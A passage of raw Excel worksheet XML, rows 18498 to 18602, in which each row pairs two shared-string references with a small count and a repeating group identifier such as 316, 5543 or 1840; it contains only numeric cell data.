      <c r="A18498" t="s">
        <v>16231</v>
      </c>
      <c r="B18498" t="s">
        <v>16218</v>
      </c>
      <c r="C18498">
        <v>0</v>
      </c>
      <c r="D18498">
        <v>316</v>
      </c>
    </row>
    <row r="18499" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18499" t="s">
        <v>16229</v>
      </c>
      <c r="B18499" t="s">
        <v>16219</v>
      </c>
      <c r="C18499">
        <v>0</v>
      </c>
      <c r="D18499">
        <v>316</v>
      </c>
    </row>
    <row r="18500" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18500" t="s">
        <v>16230</v>
      </c>
      <c r="B18500" t="s">
        <v>16220</v>
      </c>
      <c r="C18500">
        <v>0</v>
      </c>
      <c r="D18500">
        <v>316</v>
      </c>
    </row>
    <row r="18501" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18501" t="s">
        <v>16229</v>
      </c>
      <c r="B18501" t="s">
        <v>16221</v>
      </c>
      <c r="C18501">
        <v>5</v>
      </c>
      <c r="D18501">
        <v>316</v>
      </c>
    </row>
    <row r="18502" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18502" t="s">
        <v>16230</v>
      </c>
      <c r="B18502" t="s">
        <v>16222</v>
      </c>
      <c r="C18502">
        <v>0</v>
      </c>
      <c r="D18502">
        <v>316</v>
      </c>
    </row>
    <row r="18503" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18503" t="s">
        <v>16223</v>
      </c>
      <c r="B18503" t="s">
        <v>16223</v>
      </c>
      <c r="C18503">
        <v>30</v>
      </c>
      <c r="D18503">
        <v>316</v>
      </c>
    </row>
    <row r="18504" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18504" t="s">
        <v>16224</v>
      </c>
      <c r="B18504" t="s">
        <v>16224</v>
      </c>
      <c r="C18504">
        <v>2</v>
      </c>
      <c r="D18504">
        <v>316</v>
      </c>
    </row>
    <row r="18505" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18505" t="s">
        <v>16228</v>
      </c>
      <c r="B18505" t="s">
        <v>16211</v>
      </c>
      <c r="C18505">
        <v>0</v>
      </c>
      <c r="D18505">
        <v>5543</v>
      </c>
    </row>
    <row r="18506" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18506" t="s">
        <v>16231</v>
      </c>
      <c r="B18506" t="s">
        <v>16212</v>
      </c>
      <c r="C18506">
        <v>0</v>
      </c>
      <c r="D18506">
        <v>5543</v>
      </c>
    </row>
    <row r="18507" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18507" t="s">
        <v>16228</v>
      </c>
      <c r="B18507" t="s">
        <v>16213</v>
      </c>
      <c r="C18507">
        <v>0</v>
      </c>
      <c r="D18507">
        <v>5543</v>
      </c>
    </row>
    <row r="18508" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18508" t="s">
        <v>16231</v>
      </c>
      <c r="B18508" t="s">
        <v>16214</v>
      </c>
      <c r="C18508">
        <v>0</v>
      </c>
      <c r="D18508">
        <v>5543</v>
      </c>
    </row>
    <row r="18509" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18509" t="s">
        <v>16228</v>
      </c>
      <c r="B18509" t="s">
        <v>16215</v>
      </c>
      <c r="C18509">
        <v>6</v>
      </c>
      <c r="D18509">
        <v>5543</v>
      </c>
    </row>
    <row r="18510" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18510" t="s">
        <v>16231</v>
      </c>
      <c r="B18510" t="s">
        <v>16216</v>
      </c>
      <c r="C18510">
        <v>10</v>
      </c>
      <c r="D18510">
        <v>5543</v>
      </c>
    </row>
    <row r="18511" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18511" t="s">
        <v>16228</v>
      </c>
      <c r="B18511" t="s">
        <v>16217</v>
      </c>
      <c r="C18511">
        <v>5</v>
      </c>
      <c r="D18511">
        <v>5543</v>
      </c>
    </row>
    <row r="18512" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18512" t="s">
        <v>16231</v>
      </c>
      <c r="B18512" t="s">
        <v>16218</v>
      </c>
      <c r="C18512">
        <v>9</v>
      </c>
      <c r="D18512">
        <v>5543</v>
      </c>
    </row>
    <row r="18513" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18513" t="s">
        <v>16229</v>
      </c>
      <c r="B18513" t="s">
        <v>16219</v>
      </c>
      <c r="C18513">
        <v>6</v>
      </c>
      <c r="D18513">
        <v>5543</v>
      </c>
    </row>
    <row r="18514" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18514" t="s">
        <v>16230</v>
      </c>
      <c r="B18514" t="s">
        <v>16220</v>
      </c>
      <c r="C18514">
        <v>5</v>
      </c>
      <c r="D18514">
        <v>5543</v>
      </c>
    </row>
    <row r="18515" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18515" t="s">
        <v>16229</v>
      </c>
      <c r="B18515" t="s">
        <v>16221</v>
      </c>
      <c r="C18515">
        <v>15</v>
      </c>
      <c r="D18515">
        <v>5543</v>
      </c>
    </row>
    <row r="18516" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18516" t="s">
        <v>16230</v>
      </c>
      <c r="B18516" t="s">
        <v>16222</v>
      </c>
      <c r="C18516">
        <v>20</v>
      </c>
      <c r="D18516">
        <v>5543</v>
      </c>
    </row>
    <row r="18517" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18517" t="s">
        <v>16223</v>
      </c>
      <c r="B18517" t="s">
        <v>16223</v>
      </c>
      <c r="C18517">
        <v>6</v>
      </c>
      <c r="D18517">
        <v>5543</v>
      </c>
    </row>
    <row r="18518" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18518" t="s">
        <v>16224</v>
      </c>
      <c r="B18518" t="s">
        <v>16224</v>
      </c>
      <c r="C18518">
        <v>1</v>
      </c>
      <c r="D18518">
        <v>5543</v>
      </c>
    </row>
    <row r="18519" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18519" t="s">
        <v>16228</v>
      </c>
      <c r="B18519" t="s">
        <v>16211</v>
      </c>
      <c r="C18519">
        <v>0</v>
      </c>
      <c r="D18519">
        <v>1799</v>
      </c>
    </row>
    <row r="18520" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18520" t="s">
        <v>16231</v>
      </c>
      <c r="B18520" t="s">
        <v>16212</v>
      </c>
      <c r="C18520">
        <v>0</v>
      </c>
      <c r="D18520">
        <v>1799</v>
      </c>
    </row>
    <row r="18521" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18521" t="s">
        <v>16228</v>
      </c>
      <c r="B18521" t="s">
        <v>16213</v>
      </c>
      <c r="C18521">
        <v>0</v>
      </c>
      <c r="D18521">
        <v>1799</v>
      </c>
    </row>
    <row r="18522" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18522" t="s">
        <v>16231</v>
      </c>
      <c r="B18522" t="s">
        <v>16214</v>
      </c>
      <c r="C18522">
        <v>0</v>
      </c>
      <c r="D18522">
        <v>1799</v>
      </c>
    </row>
    <row r="18523" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18523" t="s">
        <v>16228</v>
      </c>
      <c r="B18523" t="s">
        <v>16215</v>
      </c>
      <c r="C18523">
        <v>1</v>
      </c>
      <c r="D18523">
        <v>1799</v>
      </c>
    </row>
    <row r="18524" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18524" t="s">
        <v>16231</v>
      </c>
      <c r="B18524" t="s">
        <v>16216</v>
      </c>
      <c r="C18524">
        <v>2</v>
      </c>
      <c r="D18524">
        <v>1799</v>
      </c>
    </row>
    <row r="18525" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18525" t="s">
        <v>16228</v>
      </c>
      <c r="B18525" t="s">
        <v>16217</v>
      </c>
      <c r="C18525">
        <v>0</v>
      </c>
      <c r="D18525">
        <v>1799</v>
      </c>
    </row>
    <row r="18526" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18526" t="s">
        <v>16231</v>
      </c>
      <c r="B18526" t="s">
        <v>16218</v>
      </c>
      <c r="C18526">
        <v>0</v>
      </c>
      <c r="D18526">
        <v>1799</v>
      </c>
    </row>
    <row r="18527" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18527" t="s">
        <v>16229</v>
      </c>
      <c r="B18527" t="s">
        <v>16219</v>
      </c>
      <c r="C18527">
        <v>0</v>
      </c>
      <c r="D18527">
        <v>1799</v>
      </c>
    </row>
    <row r="18528" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18528" t="s">
        <v>16230</v>
      </c>
      <c r="B18528" t="s">
        <v>16220</v>
      </c>
      <c r="C18528">
        <v>0</v>
      </c>
      <c r="D18528">
        <v>1799</v>
      </c>
    </row>
    <row r="18529" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18529" t="s">
        <v>16229</v>
      </c>
      <c r="B18529" t="s">
        <v>16221</v>
      </c>
      <c r="C18529">
        <v>15</v>
      </c>
      <c r="D18529">
        <v>1799</v>
      </c>
    </row>
    <row r="18530" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18530" t="s">
        <v>16230</v>
      </c>
      <c r="B18530" t="s">
        <v>16222</v>
      </c>
      <c r="C18530">
        <v>17</v>
      </c>
      <c r="D18530">
        <v>1799</v>
      </c>
    </row>
    <row r="18531" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18531" t="s">
        <v>16223</v>
      </c>
      <c r="B18531" t="s">
        <v>16223</v>
      </c>
      <c r="C18531">
        <v>26</v>
      </c>
      <c r="D18531">
        <v>1799</v>
      </c>
    </row>
    <row r="18532" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18532" t="s">
        <v>16224</v>
      </c>
      <c r="B18532" t="s">
        <v>16224</v>
      </c>
      <c r="C18532">
        <v>1</v>
      </c>
      <c r="D18532">
        <v>1799</v>
      </c>
    </row>
    <row r="18533" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18533" t="s">
        <v>16228</v>
      </c>
      <c r="B18533" t="s">
        <v>16211</v>
      </c>
      <c r="C18533">
        <v>0</v>
      </c>
      <c r="D18533">
        <v>5523</v>
      </c>
    </row>
    <row r="18534" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18534" t="s">
        <v>16231</v>
      </c>
      <c r="B18534" t="s">
        <v>16212</v>
      </c>
      <c r="C18534">
        <v>0</v>
      </c>
      <c r="D18534">
        <v>5523</v>
      </c>
    </row>
    <row r="18535" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18535" t="s">
        <v>16228</v>
      </c>
      <c r="B18535" t="s">
        <v>16213</v>
      </c>
      <c r="C18535">
        <v>0</v>
      </c>
      <c r="D18535">
        <v>5523</v>
      </c>
    </row>
    <row r="18536" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18536" t="s">
        <v>16231</v>
      </c>
      <c r="B18536" t="s">
        <v>16214</v>
      </c>
      <c r="C18536">
        <v>0</v>
      </c>
      <c r="D18536">
        <v>5523</v>
      </c>
    </row>
    <row r="18537" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18537" t="s">
        <v>16228</v>
      </c>
      <c r="B18537" t="s">
        <v>16215</v>
      </c>
      <c r="C18537">
        <v>3</v>
      </c>
      <c r="D18537">
        <v>5523</v>
      </c>
    </row>
    <row r="18538" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18538" t="s">
        <v>16231</v>
      </c>
      <c r="B18538" t="s">
        <v>16216</v>
      </c>
      <c r="C18538">
        <v>2</v>
      </c>
      <c r="D18538">
        <v>5523</v>
      </c>
    </row>
    <row r="18539" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18539" t="s">
        <v>16228</v>
      </c>
      <c r="B18539" t="s">
        <v>16217</v>
      </c>
      <c r="C18539">
        <v>0</v>
      </c>
      <c r="D18539">
        <v>5523</v>
      </c>
    </row>
    <row r="18540" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18540" t="s">
        <v>16231</v>
      </c>
      <c r="B18540" t="s">
        <v>16218</v>
      </c>
      <c r="C18540">
        <v>0</v>
      </c>
      <c r="D18540">
        <v>5523</v>
      </c>
    </row>
    <row r="18541" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18541" t="s">
        <v>16229</v>
      </c>
      <c r="B18541" t="s">
        <v>16219</v>
      </c>
      <c r="C18541">
        <v>0</v>
      </c>
      <c r="D18541">
        <v>5523</v>
      </c>
    </row>
    <row r="18542" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18542" t="s">
        <v>16230</v>
      </c>
      <c r="B18542" t="s">
        <v>16220</v>
      </c>
      <c r="C18542">
        <v>0</v>
      </c>
      <c r="D18542">
        <v>5523</v>
      </c>
    </row>
    <row r="18543" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18543" t="s">
        <v>16229</v>
      </c>
      <c r="B18543" t="s">
        <v>16221</v>
      </c>
      <c r="C18543">
        <v>0</v>
      </c>
      <c r="D18543">
        <v>5523</v>
      </c>
    </row>
    <row r="18544" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18544" t="s">
        <v>16230</v>
      </c>
      <c r="B18544" t="s">
        <v>16222</v>
      </c>
      <c r="C18544">
        <v>0</v>
      </c>
      <c r="D18544">
        <v>5523</v>
      </c>
    </row>
    <row r="18545" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18545" t="s">
        <v>16223</v>
      </c>
      <c r="B18545" t="s">
        <v>16223</v>
      </c>
      <c r="C18545">
        <v>25</v>
      </c>
      <c r="D18545">
        <v>5523</v>
      </c>
    </row>
    <row r="18546" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18546" t="s">
        <v>16224</v>
      </c>
      <c r="B18546" t="s">
        <v>16224</v>
      </c>
      <c r="C18546">
        <v>1</v>
      </c>
      <c r="D18546">
        <v>5523</v>
      </c>
    </row>
    <row r="18547" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18547" t="s">
        <v>16228</v>
      </c>
      <c r="B18547" t="s">
        <v>16211</v>
      </c>
      <c r="C18547">
        <v>0</v>
      </c>
      <c r="D18547">
        <v>1492</v>
      </c>
    </row>
    <row r="18548" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18548" t="s">
        <v>16231</v>
      </c>
      <c r="B18548" t="s">
        <v>16212</v>
      </c>
      <c r="C18548">
        <v>0</v>
      </c>
      <c r="D18548">
        <v>1492</v>
      </c>
    </row>
    <row r="18549" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18549" t="s">
        <v>16228</v>
      </c>
      <c r="B18549" t="s">
        <v>16213</v>
      </c>
      <c r="C18549">
        <v>0</v>
      </c>
      <c r="D18549">
        <v>1492</v>
      </c>
    </row>
    <row r="18550" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18550" t="s">
        <v>16231</v>
      </c>
      <c r="B18550" t="s">
        <v>16214</v>
      </c>
      <c r="C18550">
        <v>0</v>
      </c>
      <c r="D18550">
        <v>1492</v>
      </c>
    </row>
    <row r="18551" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18551" t="s">
        <v>16228</v>
      </c>
      <c r="B18551" t="s">
        <v>16215</v>
      </c>
      <c r="C18551">
        <v>1</v>
      </c>
      <c r="D18551">
        <v>1492</v>
      </c>
    </row>
    <row r="18552" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18552" t="s">
        <v>16231</v>
      </c>
      <c r="B18552" t="s">
        <v>16216</v>
      </c>
      <c r="C18552">
        <v>3</v>
      </c>
      <c r="D18552">
        <v>1492</v>
      </c>
    </row>
    <row r="18553" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18553" t="s">
        <v>16228</v>
      </c>
      <c r="B18553" t="s">
        <v>16217</v>
      </c>
      <c r="C18553">
        <v>0</v>
      </c>
      <c r="D18553">
        <v>1492</v>
      </c>
    </row>
    <row r="18554" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18554" t="s">
        <v>16231</v>
      </c>
      <c r="B18554" t="s">
        <v>16218</v>
      </c>
      <c r="C18554">
        <v>0</v>
      </c>
      <c r="D18554">
        <v>1492</v>
      </c>
    </row>
    <row r="18555" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18555" t="s">
        <v>16229</v>
      </c>
      <c r="B18555" t="s">
        <v>16219</v>
      </c>
      <c r="C18555">
        <v>0</v>
      </c>
      <c r="D18555">
        <v>1492</v>
      </c>
    </row>
    <row r="18556" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18556" t="s">
        <v>16230</v>
      </c>
      <c r="B18556" t="s">
        <v>16220</v>
      </c>
      <c r="C18556">
        <v>0</v>
      </c>
      <c r="D18556">
        <v>1492</v>
      </c>
    </row>
    <row r="18557" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18557" t="s">
        <v>16229</v>
      </c>
      <c r="B18557" t="s">
        <v>16221</v>
      </c>
      <c r="C18557">
        <v>0</v>
      </c>
      <c r="D18557">
        <v>1492</v>
      </c>
    </row>
    <row r="18558" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18558" t="s">
        <v>16230</v>
      </c>
      <c r="B18558" t="s">
        <v>16222</v>
      </c>
      <c r="C18558">
        <v>0</v>
      </c>
      <c r="D18558">
        <v>1492</v>
      </c>
    </row>
    <row r="18559" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18559" t="s">
        <v>16223</v>
      </c>
      <c r="B18559" t="s">
        <v>16223</v>
      </c>
      <c r="C18559">
        <v>24</v>
      </c>
      <c r="D18559">
        <v>1492</v>
      </c>
    </row>
    <row r="18560" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18560" t="s">
        <v>16224</v>
      </c>
      <c r="B18560" t="s">
        <v>16224</v>
      </c>
      <c r="C18560">
        <v>1</v>
      </c>
      <c r="D18560">
        <v>1492</v>
      </c>
    </row>
    <row r="18561" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18561" t="s">
        <v>16228</v>
      </c>
      <c r="B18561" t="s">
        <v>16211</v>
      </c>
      <c r="C18561">
        <v>0</v>
      </c>
      <c r="D18561">
        <v>5531</v>
      </c>
    </row>
    <row r="18562" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18562" t="s">
        <v>16231</v>
      </c>
      <c r="B18562" t="s">
        <v>16212</v>
      </c>
      <c r="C18562">
        <v>0</v>
      </c>
      <c r="D18562">
        <v>5531</v>
      </c>
    </row>
    <row r="18563" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18563" t="s">
        <v>16228</v>
      </c>
      <c r="B18563" t="s">
        <v>16213</v>
      </c>
      <c r="C18563">
        <v>0</v>
      </c>
      <c r="D18563">
        <v>5531</v>
      </c>
    </row>
    <row r="18564" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18564" t="s">
        <v>16231</v>
      </c>
      <c r="B18564" t="s">
        <v>16214</v>
      </c>
      <c r="C18564">
        <v>0</v>
      </c>
      <c r="D18564">
        <v>5531</v>
      </c>
    </row>
    <row r="18565" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18565" t="s">
        <v>16228</v>
      </c>
      <c r="B18565" t="s">
        <v>16215</v>
      </c>
      <c r="C18565">
        <v>9</v>
      </c>
      <c r="D18565">
        <v>5531</v>
      </c>
    </row>
    <row r="18566" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18566" t="s">
        <v>16231</v>
      </c>
      <c r="B18566" t="s">
        <v>16216</v>
      </c>
      <c r="C18566">
        <v>19</v>
      </c>
      <c r="D18566">
        <v>5531</v>
      </c>
    </row>
    <row r="18567" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18567" t="s">
        <v>16228</v>
      </c>
      <c r="B18567" t="s">
        <v>16217</v>
      </c>
      <c r="C18567">
        <v>0</v>
      </c>
      <c r="D18567">
        <v>5531</v>
      </c>
    </row>
    <row r="18568" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18568" t="s">
        <v>16231</v>
      </c>
      <c r="B18568" t="s">
        <v>16218</v>
      </c>
      <c r="C18568">
        <v>0</v>
      </c>
      <c r="D18568">
        <v>5531</v>
      </c>
    </row>
    <row r="18569" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18569" t="s">
        <v>16229</v>
      </c>
      <c r="B18569" t="s">
        <v>16219</v>
      </c>
      <c r="C18569">
        <v>0</v>
      </c>
      <c r="D18569">
        <v>5531</v>
      </c>
    </row>
    <row r="18570" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18570" t="s">
        <v>16230</v>
      </c>
      <c r="B18570" t="s">
        <v>16220</v>
      </c>
      <c r="C18570">
        <v>0</v>
      </c>
      <c r="D18570">
        <v>5531</v>
      </c>
    </row>
    <row r="18571" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18571" t="s">
        <v>16229</v>
      </c>
      <c r="B18571" t="s">
        <v>16221</v>
      </c>
      <c r="C18571">
        <v>0</v>
      </c>
      <c r="D18571">
        <v>5531</v>
      </c>
    </row>
    <row r="18572" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18572" t="s">
        <v>16230</v>
      </c>
      <c r="B18572" t="s">
        <v>16222</v>
      </c>
      <c r="C18572">
        <v>0</v>
      </c>
      <c r="D18572">
        <v>5531</v>
      </c>
    </row>
    <row r="18573" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18573" t="s">
        <v>16223</v>
      </c>
      <c r="B18573" t="s">
        <v>16223</v>
      </c>
      <c r="C18573">
        <v>5</v>
      </c>
      <c r="D18573">
        <v>5531</v>
      </c>
    </row>
    <row r="18574" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18574" t="s">
        <v>16224</v>
      </c>
      <c r="B18574" t="s">
        <v>16224</v>
      </c>
      <c r="C18574">
        <v>1</v>
      </c>
      <c r="D18574">
        <v>5531</v>
      </c>
    </row>
    <row r="18575" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18575" t="s">
        <v>16228</v>
      </c>
      <c r="B18575" t="s">
        <v>16211</v>
      </c>
      <c r="C18575">
        <v>0</v>
      </c>
      <c r="D18575">
        <v>1621</v>
      </c>
    </row>
    <row r="18576" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18576" t="s">
        <v>16231</v>
      </c>
      <c r="B18576" t="s">
        <v>16212</v>
      </c>
      <c r="C18576">
        <v>0</v>
      </c>
      <c r="D18576">
        <v>1621</v>
      </c>
    </row>
    <row r="18577" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18577" t="s">
        <v>16228</v>
      </c>
      <c r="B18577" t="s">
        <v>16213</v>
      </c>
      <c r="C18577">
        <v>0</v>
      </c>
      <c r="D18577">
        <v>1621</v>
      </c>
    </row>
    <row r="18578" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18578" t="s">
        <v>16231</v>
      </c>
      <c r="B18578" t="s">
        <v>16214</v>
      </c>
      <c r="C18578">
        <v>0</v>
      </c>
      <c r="D18578">
        <v>1621</v>
      </c>
    </row>
    <row r="18579" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18579" t="s">
        <v>16228</v>
      </c>
      <c r="B18579" t="s">
        <v>16215</v>
      </c>
      <c r="C18579">
        <v>1</v>
      </c>
      <c r="D18579">
        <v>1621</v>
      </c>
    </row>
    <row r="18580" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18580" t="s">
        <v>16231</v>
      </c>
      <c r="B18580" t="s">
        <v>16216</v>
      </c>
      <c r="C18580">
        <v>0</v>
      </c>
      <c r="D18580">
        <v>1621</v>
      </c>
    </row>
    <row r="18581" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18581" t="s">
        <v>16228</v>
      </c>
      <c r="B18581" t="s">
        <v>16217</v>
      </c>
      <c r="C18581">
        <v>1</v>
      </c>
      <c r="D18581">
        <v>1621</v>
      </c>
    </row>
    <row r="18582" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18582" t="s">
        <v>16231</v>
      </c>
      <c r="B18582" t="s">
        <v>16218</v>
      </c>
      <c r="C18582">
        <v>0</v>
      </c>
      <c r="D18582">
        <v>1621</v>
      </c>
    </row>
    <row r="18583" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18583" t="s">
        <v>16229</v>
      </c>
      <c r="B18583" t="s">
        <v>16219</v>
      </c>
      <c r="C18583">
        <v>1</v>
      </c>
      <c r="D18583">
        <v>1621</v>
      </c>
    </row>
    <row r="18584" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18584" t="s">
        <v>16230</v>
      </c>
      <c r="B18584" t="s">
        <v>16220</v>
      </c>
      <c r="C18584">
        <v>0</v>
      </c>
      <c r="D18584">
        <v>1621</v>
      </c>
    </row>
    <row r="18585" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18585" t="s">
        <v>16229</v>
      </c>
      <c r="B18585" t="s">
        <v>16221</v>
      </c>
      <c r="C18585">
        <v>6</v>
      </c>
      <c r="D18585">
        <v>1621</v>
      </c>
    </row>
    <row r="18586" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18586" t="s">
        <v>16230</v>
      </c>
      <c r="B18586" t="s">
        <v>16222</v>
      </c>
      <c r="C18586">
        <v>0</v>
      </c>
      <c r="D18586">
        <v>1621</v>
      </c>
    </row>
    <row r="18587" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18587" t="s">
        <v>16223</v>
      </c>
      <c r="B18587" t="s">
        <v>16223</v>
      </c>
      <c r="C18587">
        <v>26</v>
      </c>
      <c r="D18587">
        <v>1621</v>
      </c>
    </row>
    <row r="18588" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18588" t="s">
        <v>16224</v>
      </c>
      <c r="B18588" t="s">
        <v>16224</v>
      </c>
      <c r="C18588">
        <v>2</v>
      </c>
      <c r="D18588">
        <v>1621</v>
      </c>
    </row>
    <row r="18589" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18589" t="s">
        <v>16228</v>
      </c>
      <c r="B18589" t="s">
        <v>16211</v>
      </c>
      <c r="C18589">
        <v>0</v>
      </c>
      <c r="D18589">
        <v>1840</v>
      </c>
    </row>
    <row r="18590" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18590" t="s">
        <v>16231</v>
      </c>
      <c r="B18590" t="s">
        <v>16212</v>
      </c>
      <c r="C18590">
        <v>0</v>
      </c>
      <c r="D18590">
        <v>1840</v>
      </c>
    </row>
    <row r="18591" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18591" t="s">
        <v>16228</v>
      </c>
      <c r="B18591" t="s">
        <v>16213</v>
      </c>
      <c r="C18591">
        <v>0</v>
      </c>
      <c r="D18591">
        <v>1840</v>
      </c>
    </row>
    <row r="18592" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18592" t="s">
        <v>16231</v>
      </c>
      <c r="B18592" t="s">
        <v>16214</v>
      </c>
      <c r="C18592">
        <v>0</v>
      </c>
      <c r="D18592">
        <v>1840</v>
      </c>
    </row>
    <row r="18593" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18593" t="s">
        <v>16228</v>
      </c>
      <c r="B18593" t="s">
        <v>16215</v>
      </c>
      <c r="C18593">
        <v>3</v>
      </c>
      <c r="D18593">
        <v>1840</v>
      </c>
    </row>
    <row r="18594" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18594" t="s">
        <v>16231</v>
      </c>
      <c r="B18594" t="s">
        <v>16216</v>
      </c>
      <c r="C18594">
        <v>2</v>
      </c>
      <c r="D18594">
        <v>1840</v>
      </c>
    </row>
    <row r="18595" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18595" t="s">
        <v>16228</v>
      </c>
      <c r="B18595" t="s">
        <v>16217</v>
      </c>
      <c r="C18595">
        <v>0</v>
      </c>
      <c r="D18595">
        <v>1840</v>
      </c>
    </row>
    <row r="18596" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18596" t="s">
        <v>16231</v>
      </c>
      <c r="B18596" t="s">
        <v>16218</v>
      </c>
      <c r="C18596">
        <v>0</v>
      </c>
      <c r="D18596">
        <v>1840</v>
      </c>
    </row>
    <row r="18597" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18597" t="s">
        <v>16229</v>
      </c>
      <c r="B18597" t="s">
        <v>16219</v>
      </c>
      <c r="C18597">
        <v>0</v>
      </c>
      <c r="D18597">
        <v>1840</v>
      </c>
    </row>
    <row r="18598" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18598" t="s">
        <v>16230</v>
      </c>
      <c r="B18598" t="s">
        <v>16220</v>
      </c>
      <c r="C18598">
        <v>0</v>
      </c>
      <c r="D18598">
        <v>1840</v>
      </c>
    </row>
    <row r="18599" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18599" t="s">
        <v>16229</v>
      </c>
      <c r="B18599" t="s">
        <v>16221</v>
      </c>
      <c r="C18599">
        <v>4</v>
      </c>
      <c r="D18599">
        <v>1840</v>
      </c>
    </row>
    <row r="18600" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18600" t="s">
        <v>16230</v>
      </c>
      <c r="B18600" t="s">
        <v>16222</v>
      </c>
      <c r="C18600">
        <v>7</v>
      </c>
      <c r="D18600">
        <v>1840</v>
      </c>
    </row>
    <row r="18601" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18601" t="s">
        <v>16223</v>
      </c>
      <c r="B18601" t="s">
        <v>16223</v>
      </c>
      <c r="C18601">
        <v>26</v>
      </c>
      <c r="D18601">
        <v>1840</v>
      </c>
    </row>
    <row r="18602" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18602" t="s">
        <v>16224</v>
      </c>
      <c r="B18602" t="s">
        <v>16224</v>
      </c>
      <c r="C18602">
        <v>0</v>
      </c>
      <c r="D18602">
        <v>1840</v>
      </c>
    </row>
